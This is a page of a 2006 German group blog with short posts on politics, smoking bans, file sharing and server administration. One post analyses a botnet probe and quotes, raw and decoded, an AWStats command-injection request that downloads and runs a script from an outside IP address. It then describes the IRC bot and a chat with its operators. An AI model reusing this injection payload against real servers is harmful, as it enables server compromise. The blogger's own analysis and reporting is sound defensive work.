Cheney auf der Jagd

von MichiK am 15. Februar 2006 um 05:06 Uhr

Dass US-Vizepräsident Dick Cheney auf einem Jagdausflug versehentlich einen Begleiter angeschossen hat, wandert ja nun schon einige Tage durch die Medien. Doch wie ich grade las, scheint der gute Mann (das Opfer, nicht Cheney!) nun einen Herzinfarkt erlitten zu haben, weil eins der Schrotkörner, das er abbekommen hat, in Richtung Herz gewandert ist. Ohne jetzt makaber wirken zu wollen: Wenn der Mann nun daran stirbt und Cheney wegen Mordes angeklagt und zu Knast oder vielleicht zum Tode verurteilt wird, lache ich mich kaputt.

Die Anklage wegen Mordes ist übrigens garnicht so unwahrscheinlich, wenn man einmal diesen Fall betrachtet… Ja, Äpfel und Birnen.

Fnord, Real Life | 4 Kommentare »

Rauchverbot

von MichiK am 15. Februar 2006 um 04:54 Uhr

Was haben Irland, Italien, Neuseeland, Norwegen, Schottland, Schweden und viele Bundesstaaten der USA sowie seit kurzem auch England gemeinsam?

Genau, dort darf in Gaststätten, Pubs usw. nicht mehr geraucht werden.

Ich will das hier auch!

Ich hasse verqualmte und verpestete Luft, die man in Scheiben schneiden und mit nach Hause nehmen kann. Ich hasse den anschließenden Gestank in Klamotten und Haaren. Ich hasse das Kratzen im Hals und das Jucken in den Augen sowie die Tatsache, dass das Bier in vergifteter Atmosphäre nicht mehr schmeckt.

Mein Onkel starb an Lungenkrebs. Er war jahrzehntelang starker Raucher. Auch Passivrauchen ist erwiesenermaßen schädlich.

Politik, Real Life | 2 Kommentare »

Ja! Ich gestehe.

von MichiK am 15. Februar 2006 um 03:07 Uhr

Ich habe hochgeladen

Ich habe in der Vergangenheit Filesharing-Netze (BitTorrent, das eDonkey-Netz und auch andere…) genutzt und dabei nicht nur Daten heruntergeladen, sondern auch mit anderen Nutzern geteilt. Das ist per Definition erst einmal weder illegal noch sonst irgendwie verwerflich.

Fnord, Kommerz | Kommentare geschlossen

Wo ist eigentlich Barcelona?

von MichiK am 13. Februar 2006 um 23:01 Uhr

Wenn man den Werbeartikeln der Firma Karmez, wie sie beispielsweise in meiner favorisierten Pizza- und Dönerbude hier im Ort zu finden sind, glauben will, liegt es auf halbem Weg zwischen dem Mittelmeer und der Biskaya. Wenn ich mich richtig erinnere, ist Barcelona aber eine Mittelmeerstadt…

Außerdem liegt laut dieser Firma Mailand an der Adria, Paris auf der halben Strecke zwischen Bordeaux und Lyon und Frankfurt am Main in Baden-Württemberg.

Zu allem Überfluss kommt dann noch dazu, dass sie nichtmal konsequent sind, sondern die Punkte im Flash-Intro der Webseite noch wieder leicht woanders platziert haben.

Das nächste Mal bitte in den Atlas schauen, bevor Punkte auf der Karte gemalt werden! ;)

Auf den Werbeartikeln ist übrigens “Good Appetite” groß geschrieben, während “guten appetit” vollständig in Kleinschreibung gesetzt ist…

Real Life | Kommentare geschlossen

Schlecht recherchierter “City Guide”

von MichiK am 13. Februar 2006 um 22:50 Uhr

Mir ist hier ein “City Guide” der Firma Vista Point in die Hände gefallen, der sich mit meinem – jetzt ja schon nicht mehr ganz so neuen – Wohnort Leipzig befasst. Grund genug, sich den mal aus der Nähe anzuschauen. Danach hat man dann Gründe genug, ihn so wieder wegzuschmeißen, weil man damit kaum was anfangen kann…

Dick und fett steht auf dem Plan etwas von “Neuauflage 2006″ – man darf also aktuelle Informationen erwarten. Mit an Bord sein soll auch ein Stadtplan – der allerdings nicht viel mehr als eine erweiterte Übersicht der Innenstadt und ein bisschen drumherum ist. Meine Straße ist dort beispielsweise garnicht eingezeichnet. Ein richtiger Stadtplan ist was anderes. Außerdem ist ein Plan des Straßenbahn-Netzes dabei. Ja. Aber von wann ist der? Eingezeichnet ist eine Linie 13 – die ich noch nie gesehen habe – und die anderen Linien verlaufen zur Zeit sicherlich nicht so, wie auf dem Plan eingezeichnet.

Gut – der andere Linienverlauf ist nur temporär, aber nun schon seit einigen Monaten so – und es wird wohl auch noch einige Zeit dauern, bis die Linien wieder wie vorher fahren werden. Zumindest hätte man ja mal erwähnen können, dass die beiden zentralen Innenstadt-Haltestellen (Hauptbahnhof und Wilhelm-Leuschner-Platz) zur Zeit einfach nur große Baustellen sind. Der Grund für einige Bauarbeiten wird schließlich in dem tollen Heft auch erwähnt – der City-Tunnel. Er wird allerdings als “erste Leipziger U-Bahn” bezeichnet. Hat schon mal jemand eine U-Bahn gesehen, die von Nahverkehrszügen und S-Bahnen bedient wird?

Der krasseste Fehler ist allerdings auf Seite 59 in der Abteilung “Wichtige Rufnummern” zu finden. Dort ist nicht die Telefon-Vorwahl von Leipzig (0341) sondern die von Kiel (0431) angegeben… Zahlendreher hin oder her. Aber doch bitte nicht an einer so exponierten Stelle…

Man merkt: Schnell zusammengeschusterte Informationen, die nicht richtig überprüft und noch einmal auf Fehler quergelesen wurden. Hätte ich Geld dafür ausgegeben, würde ich jetzt fluchen.

Kommerz | Kommentare geschlossen

Botnets sind nicht witzig

von Khark am 12. Februar 2006 um 21:39 Uhr

Mit einem kleinen Eintrag in der access.log meines Apachen fing alles an.

GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp
%3bwget%20211%2e234%2e113%2e241%2fscripz
%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|

In ASCII dekodiert ergibt sie folgendes:

GET /awstats/awstats.pl?configdir=|echo;echo YYY;cd /tmp;wget 211.234.113.241/scripz;chmod +x scripz;./scripz;echo YYY;echo|

Irgendjemand versuchte da eine der zahlreichen AWStats Sicherheitslücken auszunutzen und irgendwas auf anfälligen Server auszuführen.
Da es Sonntag ist und ich sowieso nichts weiter vorhatte, guckt man sich die Datei “211.234.113.241/scripz” mal an.
Es ist ein kleines Bash-Skript, das 2 weitere Dateien zieht.
219.84.105.36.42/ping und 219.84.105.36.42/httpd.
Ping ist ein binary. Und da meine Code-Audit-Fähigkeiten bei Binaries komplett aufhören lassen wir es mal außer acht :D

httpd hingegen ist ein kleiner IRC-Client in Perl, der dafür sorgt das sich alle infizierten Clients in Undernet in einem Channel sammeln und sich mit einem “Hallo, hier bin ich.” melden.

In eben jenen Channel bin ich dann auch mal spontan gegangen und hatte eine nettes sinnloses Gespräch mit einem der 3 Betreiber des Botnets.

Zitat:
<xxx> the botnet is just something for fun :)
<xxx> nothing else
[...]
<xxx> i run the bots with the uid that the apache servere is started
<xxx> nothing more
[...]
[We are scanning...]
<xxx> mambo awstats and xmlrpc
<xxx> and other php bugs :P
<xxx> try to patch your server…

Tjojo.. Schon spannend so ein Ausflug in die Welt der krassen Hacker.
Und wie schön, das mein Apache noch nichtmal PHP geschweige den Perl kennt.
– Die Serverbetreiber sind informiert und ich hoffe sie lesen die Mail auch.

Update:
Der Serveroperator hat die Mail gelesen und sich ganz nett für den Tipp bedankt.
Laut seiner Aussage verfolgt er diese “Malware” schon seit Monaten, aber diesmal sei es das erste mal, das sich ein Channel der Malware im Undernet befindet.
Die Betreiber der infizierten Maschinen werden informiert und sie versuchen zu verhindern, das die Botnet-Betreiber nochmal das Undernet missbrauchen. (Was aber wohl sehr schwer werden dürfte..)

Fnord, Geek Stuff, Real Life | 2 Kommentare »

Merke:

von MichiK am 12. Februar 2006 um 20:43 Uhr

Reboote niemals auf einen Rechner, der weiter als ein paar Häuser von dir entfernt steht, wenn du dir nicht absolut sicher bist, dass er nach dem Reboot wieder vernünftig startet.

Bei Servern im Rechenzentrum hat man ja wenigstens eine Console oder zumindest Remote Hands. Bei einem Rechner in meiner Wohnung in Leipzig sieht das dann schon wieder anders aus. :(

Geek Stuff, Netzwerk | Kommentare geschlossen

Yeah!

von Khark am 11. Februar 2006 um 11:58 Uhr

Feb 10 13:56:10 ip.ip.ip.ip sshd[4793]: Illegal user 9999 from 64.27.4.67

Scheint so, als wäre wieder alles in Ordnung.

Gibt es eine Art “Größte Zeitspanne ohne SSH brute force Angriff”-Highscorer?
Also sowas wie der Uptime Daemon nur für SSH.

Blahfasel, Geek Stuff | 2 Kommentare »

Der zweite Tor-Server

von MichiK am 11. Februar 2006 um 03:51 Uhr

Bevor ich es vergesse… Vor einigen Tagen ist mir aufgefallen, dass ich ja einen Server habe und den kaum nutze (ein paar hundert Mails am Tag und das wars…) aber dort seit kurzem nicht mehr 30 sondern 250 GB Freitraffic pro Monat habe. Ratet mal…

Genau: Ich habe sofort einen Tor-Node draus gemacht. ;)

Geek Stuff, Software | 1 Kommentar »

Telefonnummer in whois-Daten

von MichiK am 10. Februar 2006 um 02:31 Uhr

Bei meinem DeNIC-Handle habe ich eine lange Frankfurter Telefon- und Faxnummer in meinen Kontaktdaten angegeben. Die stellt mir mein ISP sowieso zur Verfügung und die kostet mich nichts. Faxe und Anrufe landen dann in meinem Mail-Postfach.

So erreicht man mich übrigens wirklich schnell und zuverlässig. Mein Mobiltelefon ist zwar immer eingeschaltet, der Klingelton aber in der Regel abgestellt – es sei denn, ich erwarte einen dringenden Anruf. Auf meinem Festnetzanschluss bin ich zu üblichen Bürozeiten sowieso nicht zu erreichen, weil ich dann üblicherweise nicht zu Hause bin. Und im Moment bin ich sowieso ganz woanders…

Leider darf eine Telefon- und Faxnummer bei Handles für .com/.net/.org-Domains maximal 12 Stellen lang sein. Das ist doch Fnord. Was machen hier eigentlich Administratoren von Firmen, die nur eine lange Nummer mit Durchwahl haben? Ich kann mir durchaus das Szenario 4stellige Vorwahl – 6stellige Rufnummer – 3stellige Durchwahl vorstellen.

Geek Stuff | Kommentare geschlossen

Schlampige Programmierung

von MichiK am 9. Februar 2006 um 23:21 Uhr

Wie findet man am einfachsten schlampig programmierte PHP-Skripte auf dem eigenen Webserver? Ganz einfach:

short_open_tag = off

in die php.ini – und dann nachschauen, was alles kaputtgegangen ist…

Geek Stuff, Software | Kommentare geschlossen

Reichelts Kundendatenbank

von MichiK am 9. Februar 2006 um 22:04 Uhr

Die Kundendatenbank von Reichelt Elektronik ist ziemlich verstrahlt. Ich habe eine Kundennummer dort und auch eine Kundenkarte. So kann ich bequem im Online-Shop bestellen, mich ins Auto setzen und nach Sande fahren (von meinen Eltern aus knappe 8 km) und das Zeug selbst abholen. Geht schnell und spart Versandkosten.

Nun habe ich einmal von Leipzig aus etwas bestellt und wollte das per Post verschickt haben. Ich habe dabei meine normale Kundennummer benutzt – warum auch nicht? – und lediglich die Versandadresse geändert. Nun habe ich etwas bestellt, als ich wieder hier in der Gegend war und bin zu Reichelt gefahren, wollte die Karte ins Lesegerät stecken, um die bevorzugte Behandlung zu erhalten, wie man sie als Vorbesteller mit Kundenkarte erhält – und was passiert? “Karte ungültig!”

Das lag laut Aussage des Menschen hinterm Tresen an meiner Adressänderung. Ich frage mich jetzt ganz ehrlich, was die Änderung einer Versandadresse mit einer Kundenkarte für Selbstabholer zu tun hat? Wozu habe ich denn dann noch eine Kundennummer? Die sollte doch eigentlich Primärschlüssel der Kundendatenbank sein und zur Identifizierung völlig ausreichen…

Edit: Bevor ich es vergesse – der Mensch fand dann meine Bestellung manuell zunächst nicht in seiner Liste. Sie war unter “Vorname Nachname” und nicht unter “Nachname, Vorname” einsortiert.

Fnord | Kommentare geschlossen

Ich trete meinen SuSE VPS

von Khark am 9. Februar 2006 um 21:56 Uhr

Wir alle kennen ja das lustige “Ich packe meinen Koffer”-Spiel, wo man pro Person immer einen Gegenstand mehr in seinen Koffer hineinpackt.
Ich fange jetzt hier mal das Spiel “Ich trete meinen SuSE VPS” an. Jeder der nachfolgenden Mitspieler muss den Satz um eine weitere VPS-/SuSE-Typische Softwarekomponente erweitern.

Ich trete meinen SuSE VPS mit Plesk 7 Reloaded.

Blahfasel, Fnord, Geek Stuff | 6 Kommentare »

Oh freude

von Khark am 9. Februar 2006 um 15:29 Uhr

Ich hab gerade die erste Mail über die Assurersuche bei CACert.org mit einer Bitte nach einem Assuring bekommen.
Bisher habe ich ja nur Leute auf dem 22C3 assured.

Blahfasel, Geek Stuff | Kommentare geschlossen

Grund für die Downtime

von Khark am 8. Februar 2006 um 18:39 Uhr

So wir sind wieder da. Und wenn wir $Root erreicht haben auch wieder mit unseren alten Domains.
Bleibt nur noch die Frage zu klären: Wieso sind wir umgezogen?

Dies will ich nun mal erklären:
Zum zweiten mal umgezogen sind wir, weil sich auf dem neuen Server das MySQL Backup nicht einspielen lassen wollte. PhpMyAdmin warf mir komische Fehlermeldungen entgegen, woraufhin ich u.a. beschloss mich mal wieder mehr in die MySQL-Syntax einzulesen und das man PhpMyAdmin nicht wirklich benutzen will.
– Auch wenn es für so Dinge wie Datenbankverwaltung von Foren/Blogs/etc. echt praktisch ist.

Hinzukam, das der Apache auf dem 1. neuen Server anscheinend kein ändern der Verzeichnissregeln durch .htaccess Dateien erlaubt hat (AllowOverride none). Dafür spricht, das die RewriteRules in der .htaccess nicht gegriffen haben und ein Zugriff auf die install.php möglich war.
Dies hat dann wohl auch jemand ausgenutzt und einfach das bestehende Blog mit einem Neuen geplättet.
Ärgerlich war dies insofern, da das Blog zu diesem Zeitpunkt bis auf die RewriteRules funktioniert hatte. Die MySQL-Datenbank mit knapp 21.000 Zeilen war zu diesem Zeitpunkt von mir per Copy&Paste schon eingefügt gewesen.
– Die Importfunktion von PhpMyAdmin weigerte sich behaarlich die mit PhpMyAdmin angelegte .sql Datei zu importieren.
(Wohl weil PhpMyAdmin keine Schreibrechte in /tmp besaß.)

Und als ich dies dann wieder händisch von Hand machen wollte, weigerte sich auch PhpMyAdmin auf einmal die SQL-Statements zu akzeptieren. Selbst dann, wenn ich Zeile für Zeile rauskopierte und in die SQL-Dialogbox eingefügt habe.

Somit haben wir das Blog aus Michis Server gelegt und warten jetzt eigentlich nur noch darauf, das $Root Zeit hat den DNS A-Record umzubiegen..

Zu der Aktion mit dem Blog plätten kann ich nur sagen: Tja. Selbst schuld, wenn man die install.php nicht löscht.
Andererseits finde ich es etwas blöd sowas zu machen, wenn man weiß das an den Datenbanken etc. rumgefrickelt wird, wodurch dann kurzfristig mal Sicherheitslücken auftreten können.
Selbige dann gleich mit der Kettensäge auszunutzen… Hmm.. Kann man machen. Sollte man aber nicht.

Blahfasel, Geek Stuff | Kommentare geschlossen

No more SSH brute force attacks?

von Khark am 7. Februar 2006 um 14:52 Uhr

SSH brute force Angriffe sind ja so ziemlich das normalste auf dieser Welt, wenn man einen Rechner am Internet hängen hat auf dem der SSH-Dienst läuft.
So wunderte es mich auch nicht, das ich Angriffe aus Frankreich, Südafrika, Thailand und England zu verzeichnen hatte. Diese fingen ab dem Tag der Bereitstellung meines Servers an und es sah nicht so aus, als ob sie kurz oder mittelfristig aufhören würden.
Insbesondere der Französische Student von der “Universite de Nantes” machte sich sehr verdient und führte mit knapp 4000 fehlgeschlagenen Logins deutlich die Statistik an.
– Da aber nur ein User explizit die Berechtigung hat über SSH auf den Rechner zuzugreifen und dieser Username nicht einmal irgendwo als “Illegal Login” auftauchte (es sei denn, es waren meine eigenen) machte ich mir da nicht so viel Gedanken.

Am 5. Februar fügte ich nun ein kleines SSH-Banner ein, das mir $Jemand gegeben hatte.
Es sagt lediglich folgendes in Deutsch, English und Französisch aus:
“Saemtliche Aktionen auf diesem System werden protokolliert und koennen gerichtlich verwendet werden.
Unerlaubter Zugriff wird strafrechtlich verfolgt.”
(Das Text-File gibts hier: http://kharkerlake.net/ssh-banner.txt)

Nichts wildes eigentlich. Wenn man einem SSH brute force startet, ist einem vorher klar was man da tut und vorhat. Auch, das man sich strafbar macht, wenn man einen gefundenden Login tatsächlich benutzt.
Komisch fand ich nun, das ich seit dem 6. Februar ab 18 Uhr keinerlei SSH-Probes mehr zu verzeichnen habe.
– Ist das Banner wirklich so böse??
Oder haben die Leute nur gemerkt, das da jemand auf dem System ist (“Das System lebt.”) und dieser jemand es versteht sich das SSH-Logfile anzugucken – woraufhin sie ihre Versuche einstellten?

Konnte schonmal jemand das gleiche Phänomen auf einem seiner Server beobachten?

Fnord, Geek Stuff | 4 Kommentare »

Inlineskating ist ein Indoor-Sport!

von Khark am 6. Februar 2006 um 21:14 Uhr

Und zwar wörtlich.
Nur sollte man die Heizungskörper nicht zum abbremsen missbrauchen, wenn man zu schnell im Wohnzimmer unterwegs ist und droht mit Mamas Bügelbrett zusammenzustoßen.

Ach… Fragt nicht…

Blahfasel | Kommentare geschlossen

Es geht wieder

von MichiK am 5. Februar 2006 um 12:23 Uhr

So, nachdem ich mal alles auf meinen Server umgezogen und eine Ewigkeit dran gefrickelt hab, geht jetzt erst einmal alles wieder. Wenn Khark die Einträge im DNS umgebogen hat, sollte alles wieder zur vollsten Zufriedenheit laufen.

Meta | 1 Kommentar »

Ye good old ASCII-Theme

von Khark am 30. Januar 2006 um 22:28 Uhr

Irgendwie scheint der Apache die RewriteRules gecached zu haben oder so???

*grübbel*

Naja.. So lange wir auf den restart warten definieren wir unser Erscheinungsbild einfach als das vi-Theme.
Das macht uns nicht nur 31337 sondern auch 334571210.

Ach ja: Dieses Posting bedeutet, das der Umzug abgeschlossen ist.

Blahfasel | Kommentare geschlossen

Nomaden-Geeks

von Khark am 29. Januar 2006 um 00:46 Uhr

So, damit ihr im Stress zwischen virtuellem Umziehen und Deadline einhalten nicht zu kurz kommt, gibt es hier mal eine Info.

Der Server auf dem diese Daten liegen wird Sonntag gnadenlos abgeschaltet. Zwar sollen die Daten vorher noch umziehen, aber wie schnell dies passiert.. K.a. Wenn alles gut läuft tut es Montag morgen :D
Ansonsten müsst ihr eben mal eine Zeit ohne uns auskommen.
Mit meinem Shellacc bin ich nun jedenfalls umgezogen, dazu habe ich mir bei zhosting einen virtuellen Debian Server geholt.
– Ich komme z.Z. einfach nicht dazu weiter das SuSE-System zu zerschießen, aber IRC, Silc und ICQ brauche ich trotzdem.

Anmerkend sei noch gesagt, das“scp -r” extrem praktisch ist und man usermod -d -m und usermod -l machen sollte bevor man alle screens gestartet hat… *grml*

Blahfasel, Geek Stuff | Kommentare geschlossen

« Ältere Einträge
Neuere Einträge »